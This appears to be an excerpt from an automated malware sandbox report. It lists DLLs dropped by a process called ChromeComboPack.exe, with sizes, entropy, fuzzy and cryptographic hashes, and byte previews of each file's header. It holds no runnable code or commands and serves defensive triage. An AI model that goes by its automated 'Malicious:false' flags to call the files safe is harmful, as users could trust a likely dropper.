                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.(...0......P.....................................................`.........................................pY.......Z..d............p..................4...@S...............................R..@............@...............................text...X'.......(.................. ..`.rdata..T....@... ...,..............@..@.data...8....`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..4............T..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):17920
                                                                                                                                                                                                                                            Entropy (8bit):5.353267174592179
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:7PHNP3Mj7Be/yB/6sB3yxcb+IMcOYqQViCBD8bg6Vf4A:hPcnB8KSsB34cb+bcOYpMCBDX
                                                                                                                                                                                                                                            MD5:D48BFFA1AF800F6969CFB356D3F75AA6
                                                                                                                                                                                                                                            SHA1:2A0D8968D74EBC879A17045EFE86C7FB5C54AEE6
                                                                                                                                                                                                                                            SHA-256:4AA5E9CE7A76B301766D3ECBB06D2E42C2F09D0743605A91BF83069FEFE3A4DE
                                                                                                                                                                                                                                            SHA-512:30D14AD8C68B043CC49EAFB460B69E83A15900CB68B4E0CBB379FF5BA260194965EF300EB715308E7211A743FF07FA7F8779E174368DCAA7F704E43068CC4858
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.(... ......P.....................................................`..........................................I.......J..d....p.......`..................,....C...............................A..@............@...............................text....'.......(.................. ..`.rdata..8....@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..,............D..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12288
                                                                                                                                                                                                                                            Entropy (8bit):4.741247880746506
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:0F/1nb2mhQtkgU7L9D037tfcqgYvEJPb:u2f6L9DSJxgYvEJj
                                                                                                                                                                                                                                            MD5:4D9182783EF19411EBD9F1F864A2EF2F
                                                                                                                                                                                                                                            SHA1:DDC9F878B88E7B51B5F68A3F99A0857E362B0361
                                                                                                                                                                                                                                            SHA-256:C9F4C5FFCDD4F8814F8C07CE532A164AB699AE8CDE737DF02D6ECD7B5DD52DBD
                                                                                                                                                                                                                                            SHA-512:8F983984F0594C2CAC447E9D75B86D6EC08ED1C789958AFA835B0D1239FD4D7EBE16408D080E7FCE17C379954609A93FC730B11BE6F4A024E7D13D042B27F185
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8.......9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):14848
                                                                                                                                                                                                                                            Entropy (8bit):5.212941287344097
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:2F/1nb2mhQtkRySMfJ2ycxFzShJD9bAal2QDeJKcqgQx2QY:M2fKRQB2j8JD2fJagQx2QY
                                                                                                                                                                                                                                            MD5:F4EDB3207E27D5F1ACBBB45AAFCB6D02
                                                                                                                                                                                                                                            SHA1:8EAB478CA441B8AD7130881B16E5FAD0B119D3F0
                                                                                                                                                                                                                                            SHA-256:3274F49BE39A996C5E5D27376F46A1039B6333665BB88AF1CA6D37550FA27B29
                                                                                                                                                                                                                                            SHA-512:7BDEBF9829CB26C010FCE1C69E7580191084BCDA3E2847581D0238AF1CAA87E68D44B052424FDC447434D971BB481047F8F2DA1B1DEF6B18684E79E63C6FBDC5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%..... ......P.....................................................`..........................................9......|:..d....`.......P..@............p..,....3...............................2..@............0...............................text...X........................... ..`.rdata.......0....... ..............@..@.data...8....@.......0..............@....pdata..@....P.......2..............@..@.rsrc........`.......6..............@..@.reloc..,....p.......8..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):14336
                                                                                                                                                                                                                                            Entropy (8bit):5.181291194389683
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:hF/1nb2mhQt7fSOp/CJPvADQHKtxSOvbcqgEvcM+:N2fNKOZWPIDnxVlgEvL
                                                                                                                                                                                                                                            MD5:9D28433EA8FFBFE0C2870FEDA025F519
                                                                                                                                                                                                                                            SHA1:4CC5CF74114D67934D346BB39CA76F01F7ACC3E2
                                                                                                                                                                                                                                            SHA-256:FC296145AE46A11C472F99C5BE317E77C840C2430FBB955CE3F913408A046284
                                                                                                                                                                                                                                            SHA-512:66B4D00100D4143EA72A3F603FB193AFA6FD4EFB5A74D0D17A206B5EF825E4CC5AF175F5FB5C40C022BDE676BA7A83087CB95C9F57E701CA4E7F0A2FCE76E599
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%..... ......P.....................................................`.........................................09.......9..d....`.......P..@............p..,....3...............................2..@............0...............................text...8........................... ..`.rdata..4....0......................@..@.data...8....@......................@....pdata..@....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..,....p.......6..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):14336
                                                                                                                                                                                                                                            Entropy (8bit):5.140195114409974
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:RsiHXqpo0cUp8XnUp8XjEQnlDtJI6rcqgcx2:f6DcUp8XUp8AclDA69gcx2
                                                                                                                                                                                                                                            MD5:8A92EE2B0D15FFDCBEB7F275154E9286
                                                                                                                                                                                                                                            SHA1:FA9214C8BBF76A00777DFE177398B5F52C3D972D
                                                                                                                                                                                                                                            SHA-256:8326AE6AD197B5586222AFA581DF5FE0220A86A875A5E116CB3828E785FBF5C2
                                                                                                                                                                                                                                            SHA-512:7BA71C37AAF6CB10FC5C595D957EB2846032543626DE740B50D7CB954FF910DCF7CEAA56EB161BAB9CC1F663BADA6CA71973E6570BAC7D6DA4D4CC9ED7C6C3DA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%..... ......P.....................................................`..........................................9......0:..d....`.......P..(............p..,....4...............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..,....p.......6..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13824
                                                                                                                                                                                                                                            Entropy (8bit):5.203867759982304
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:WsiHXqpwUiv6wPf+4WVrd1DFrCqwWwcqgfvE:s6biio2Pd1DFmlgfvE
                                                                                                                                                                                                                                            MD5:FE16E1D12CF400448E1BE3FCF2D7BB46
                                                                                                                                                                                                                                            SHA1:81D9F7A2C6540F17E11EFE3920481919965461BA
                                                                                                                                                                                                                                            SHA-256:ADE1735800D9E82B787482CCDB0FBFBA949E1751C2005DCAE43B0C9046FE096F
                                                                                                                                                                                                                                            SHA-512:A0463FF822796A6C6FF3ACEBC4C5F7BA28E7A81E06A3C3E46A0882F536D656D3F8BAF6FB748008E27F255FE0F61E85257626010543FC8A45A1E380206E48F07C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%............P.....................................................`.........................................p8...... 9..d....`.......P..(............p..,...@3...............................2..@............0...............................text...X........................... ..`.rdata..p....0......................@..@.data...p....@.......,..............@....pdata..(....P......................@..@.rsrc........`.......2..............@..@.reloc..,....p.......4..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15360
                                                                                                                                                                                                                                            Entropy (8bit):5.478301937972917
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:hZ9WXA7M93g8U7soSchhiLdjM5J6ECTGmDZkRsP0rcqgjPrvE:8Q0gH7zSccA5J6ECTGmDua89gjPrvE
                                                                                                                                                                                                                                            MD5:34EBB5D4A90B5A39C5E1D87F61AE96CB
                                                                                                                                                                                                                                            SHA1:25EE80CC1E647209F658AEBA5841F11F86F23C4E
                                                                                                                                                                                                                                            SHA-256:4FC70CB9280E414855DA2C7E0573096404031987C24CF60822854EAA3757C593
                                                                                                                                                                                                                                            SHA-512:82E27044FD53A7309ABAECA06C077A43EB075ADF1EF0898609F3D9F42396E0A1FA4FFD5A64D944705BBC1B1EBB8C2055D8A420807693CC5B70E88AB292DF81B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%. ..........P.....................................................`..........................................8.......9..d....`.......P..X............p..,....3...............................1..@............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......2..............@....pdata..X....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):18432
                                                                                                                                                                                                                                            Entropy (8bit):5.69608744353984
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:nkP5RjF7GsIyV6Lx41NVYaVmtShQRKAa8+DSngkov:onx7RI26LuuHKz8+DbN
                                                                                                                                                                                                                                            MD5:42C2F4F520BA48779BD9D4B33CD586B9
                                                                                                                                                                                                                                            SHA1:9A1D6FFA30DCA5CE6D70EAC5014739E21A99F6D8
                                                                                                                                                                                                                                            SHA-256:2C6867E88C5D3A83D62692D24F29624063FCE57F600483BAD6A84684FF22F035
                                                                                                                                                                                                                                            SHA-512:1F0C18E1829A5BAE4A40C92BA7F8422D5FE8DBE582F7193ACEC4556B4E0593C898956065F398ACB34014542FCB3365DC6D4DA9CE15CB7C292C8A2F55FB48BB2B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%.*... ......P.....................................................`..........................................I.......J..d....p.......`..................,....D..............................PC..@............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data...8....P.......>..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc..,............F..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):19456
                                                                                                                                                                                                                                            Entropy (8bit):5.7981108922569735
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:qPHNP3MjevhSY/8EBbVxcJ0ihTLdFDuPHgj+kf4D:sPcKvr/jUJ0sbDGAj+t
                                                                                                                                                                                                                                            MD5:AB0BCB36419EA87D827E770A080364F6
                                                                                                                                                                                                                                            SHA1:6D398F48338FB017AACD00AE188606EB9E99E830
                                                                                                                                                                                                                                            SHA-256:A927548ABEA335E6BCB4A9EE0A949749C9E4AA8F8AAD481CF63E3AC99B25A725
                                                                                                                                                                                                                                            SHA-512:3580FB949ACEE709836C36688457908C43860E68A36D3410F3FA9E17C6A66C1CDD7C081102468E4E92E5F42A0A802470E8F4D376DAA4ED7126818538E0BD0BC4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.0..........P.....................................................`..........................................H.......I..d....p.......`..X...............,....C...............................A..@............@...............................text..../.......0.................. ..`.rdata.......@.......4..............@..@.data........P.......B..............@....pdata..X....`.......D..............@..@.rsrc........p.......H..............@..@.reloc..,............J..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22016
                                                                                                                                                                                                                                            Entropy (8bit):5.865452719694432
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:y1jwGPJHLvzcY1EEerju9LcTZ6RO3RouLKtcyDNOcwgjxo:QjwyJUYToZwOLuzDNB1j
                                                                                                                                                                                                                                            MD5:C8FE3FF9C116DB211361FBB3EA092D33
                                                                                                                                                                                                                                            SHA1:180253462DD59C5132FBCCC8428DEA1980720D26
                                                                                                                                                                                                                                            SHA-256:25771E53CFECB5462C0D4F05F7CAE6A513A6843DB2D798D6937E39BA4B260765
                                                                                                                                                                                                                                            SHA-512:16826BF93C8FA33E0B5A2B088FB8852A2460E0A02D699922A39D8EB2A086E981B5ACA2B085F7A7DA21906017C81F4D196B425978A10F44402C5DB44B2BF4D00A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.8... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text....6.......8.................. ..`.rdata.......P.......<..............@..@.data........`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..,............T..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):22016
                                                                                                                                                                                                                                            Entropy (8bit):5.867732744112887
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:51jwGPJHLxzcY1EEerju9LcTZ6RO3RouLKtcyDNIegjxo:rjwyJOYToZwOLuzDNI7j
                                                                                                                                                                                                                                            MD5:A442EA85E6F9627501D947BE3C48A9DD
                                                                                                                                                                                                                                            SHA1:D2DEC6E1BE3B221E8D4910546AD84FE7C88A524D
                                                                                                                                                                                                                                            SHA-256:3DBCB4D0070BE355E0406E6B6C3E4CE58647F06E8650E1AB056E1D538B52B3D3
                                                                                                                                                                                                                                            SHA-512:850A00C7069FFDBA1EFE1324405DA747D7BD3BA5D4E724D08A2450B5A5F15A69A0D3EAF67CEF943F624D52A4E2159A9F7BDAEAFDC6C689EACEA9987414250F3B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.8... ......P.....................................................`..........................................Z.......[..d............p..................,... T...............................R..@............P...............................text....6.......8.................. ..`.rdata.......P.......<..............@..@.data........`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..,............T..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):27136
                                                                                                                                                                                                                                            Entropy (8bit):5.860044313282322
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:xFDL3RqE3MjjQ95UnLa+1WT1aA7qHofg5JptfISH2mDDXfgjVx2:jDLh98jjRe+1WT1aAeIfMzxH2mDDIj
                                                                                                                                                                                                                                            MD5:59BA0E05BE85F48688316EE4936421EA
                                                                                                                                                                                                                                            SHA1:1198893F5916E42143C0B0F85872338E4BE2DA06
                                                                                                                                                                                                                                            SHA-256:C181F30332F87FEECBF930538E5BDBCA09089A2833E8A088C3B9F3304B864968
                                                                                                                                                                                                                                            SHA-512:D772042D35248D25DB70324476021FB4303EF8A0F61C66E7DED490735A1CC367C2A05D7A4B11A2A68D7C34427971F96FF7658D880E946C31C17008B769E3B12F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.J..."......P.....................................................`......................................... l.......m..d...............................,....e...............................d..@............`...............................text...hH.......J.................. ..`.rdata..X....`.......N..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..,............h..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):27136
                                                                                                                                                                                                                                            Entropy (8bit):5.917025846093607
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:tFYLXRqEnMgj969GUnLa+1WT1aA7qHofg5JptfIS320DXwElrgjhig:PYLB9Mgj0e+1WT1aAeIfMzx320DXD+j
                                                                                                                                                                                                                                            MD5:8194D160FB215498A59F850DC5C9964C
                                                                                                                                                                                                                                            SHA1:D255E8CCBCE663EE5CFD3E1C35548D93BFBBFCC0
                                                                                                                                                                                                                                            SHA-256:55DEFCD528207D4006D54B656FD4798977BD1AAE6103D4D082A11E0EB6900B08
                                                                                                                                                                                                                                            SHA-512:969EEAA754519A58C352C24841852CF0E66C8A1ADBA9A50F6F659DC48C3000627503DDFB7522DA2DA48C301E439892DE9188BF94EEAF1AE211742E48204C5E42
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%.J..."......P.....................................................`..........................................l.......m..d...............................,...@f...............................e..@............`...............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..,............h..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):12800
                                                                                                                                                                                                                                            Entropy (8bit):4.999870226643325
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:DzFRF/1nb2mhQtk4axusjfkgZhoYDQgRjcqgQvEty:DzFd2f64axnTTz5D1gQvEty
                                                                                                                                                                                                                                            MD5:C89BECC2BECD40934FE78FCC0D74D941
                                                                                                                                                                                                                                            SHA1:D04680DF546E2D8A86F60F022544DB181F409C50
                                                                                                                                                                                                                                            SHA-256:E5B6E58D6DA8DB36B0673539F0C65C80B071A925D2246C42C54E9FCDD8CA08E3
                                                                                                                                                                                                                                            SHA-512:715B3F69933841BAADC1C30D616DB34E6959FD9257D65E31C39CD08C53AFA5653B0E87B41DCC3C5E73E57387A1E7E72C0A668578BD42D5561F4105055F02993C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*b..*b..*b..R...*b..Uc..*b.Rc..*b..*c..*b..Ug..*b..Uf..*b..Ua..*b..j..*b..b..*b....*b..`..*b.Rich.*b.................PE..d....e.........." ...%............P.....................................................`..........................................8......89..d....`.......P...............p..,....3...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......(..............@....pdata.......P.......*..............@..@.rsrc........`......................@..@.reloc..,....p.......0..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):13312
                                                                                                                                                                                                                                            Entropy (8bit):5.025153056783597
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:AF/1nb2mhQtks0iiNqdF4mtPjD02A5APYcqgYvEL2x:62f6fFA/4GjDFcgYvEL2x
                                                                                                                                                                                                                                            MD5:C4CC05D3132FDFB05089F42364FC74D2
                                                                                                                                                                                                                                            SHA1:DA7A1AE5D93839577BBD25952A1672C831BC4F29
                                                                                                                                                                                                                                            SHA-256:8F3D92DE840ABB5A46015A8FF618FF411C73009CBAA448AC268A5C619CF84721
                                                                                                                                                                                                                                            SHA-512:C597C70B7AF8E77BEEEBF10C32B34C37F25C741991581D67CF22E0778F262E463C0F64AA37F92FBC4415FE675673F3F92544E109E5032E488F185F1CFBC839FE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........4Y..Z...Z...Z......Z..[...Z...[...Z...[...Z.._...Z..^...Z..Y...Z..RR...Z..RZ...Z..R....Z..RX...Z.Rich..Z.........PE..d....e.........." ...%............P.....................................................`..........................................8......h9..d....`.......P..X............p..,....2...............................1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...8....@.......*..............@....pdata..X....P.......,..............@..@.rsrc........`.......0..............@..@.reloc..,....p.......2..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                                                            Entropy (8bit):5.235115741550938
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:XTRgffnRaNfBj9xih1LPK73jm6AXiN4rSRIh42gDhgvrjcqgCieT3WQ:XafgNpj9cHW3jqXeBRamDOZgCieT
                                                                                                                                                                                                                                            MD5:1E201DF4B4C8A8CD9DA1514C6C21D1C4
                                                                                                                                                                                                                                            SHA1:3DC8A9C20313AF189A3FFA51A2EAA1599586E1B2
                                                                                                                                                                                                                                            SHA-256:A428372185B72C90BE61AC45224133C4AF6AE6682C590B9A3968A757C0ABD6B4
                                                                                                                                                                                                                                            SHA-512:19232771D4EE3011938BA2A52FA8C32E00402055038B5EDF3DDB4C8691FA7AE751A1DC16766D777A41981B7C27B14E9C1AD6EBDA7FFE1B390205D0110546EE29
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%."... ......P.....................................................`.........................................`I......TJ..d....p.......`..p...............,....C...............................B..@............@...............................text...(!.......".................. ..`.rdata.......@.......&..............@..@.data........P.......6..............@....pdata..p....`.......8..............@..@.rsrc........p.......<..............@..@.reloc..,............>..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15360
                                                                                                                                                                                                                                            Entropy (8bit):5.133714807569085
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:JZNGXEgvUh43G6coX2SSwmPL4V7wTdDlpaY2cqgWjvE:EVMhuGGF2L4STdDyYWgWjvE
                                                                                                                                                                                                                                            MD5:76C84B62982843367C5F5D41B550825F
                                                                                                                                                                                                                                            SHA1:B6DE9B9BD0E2C84398EA89365E9F6D744836E03A
                                                                                                                                                                                                                                            SHA-256:EBCD946F1C432F93F396498A05BF07CC77EE8A74CE9C1A283BF9E23CA8618A4C
                                                                                                                                                                                                                                            SHA-512:03F8BB1D0D63BF26D8A6FFF62E94B85FFB4EA1857EB216A4DEB71C806CDE107BA0F9CC7017E3779489C5CEF5F0838EDB1D70F710BCDEB629364FC288794E6AFE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Y..z...z...z......z..{...z...{...z...{...z......z..~...z..y...z..Rr...z..Rz...z..R....z..Rx...z.Rich..z.................PE..d....e.........." ...%..... ......P.....................................................`......................................... 9.......9..d....`.......P..|............p..,....3...............................1..@............0...............................text...X........................... ..`.rdata..(....0......."..............@..@.data........@.......2..............@....pdata..|....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..,....p.......:..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):35840
                                                                                                                                                                                                                                            Entropy (8bit):5.928082706906375
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:8bEkzS7+k9rMUb8cOe9rs9ja+V/Mhjh56GS:8bEP779rMtcOCs0I/Mhf
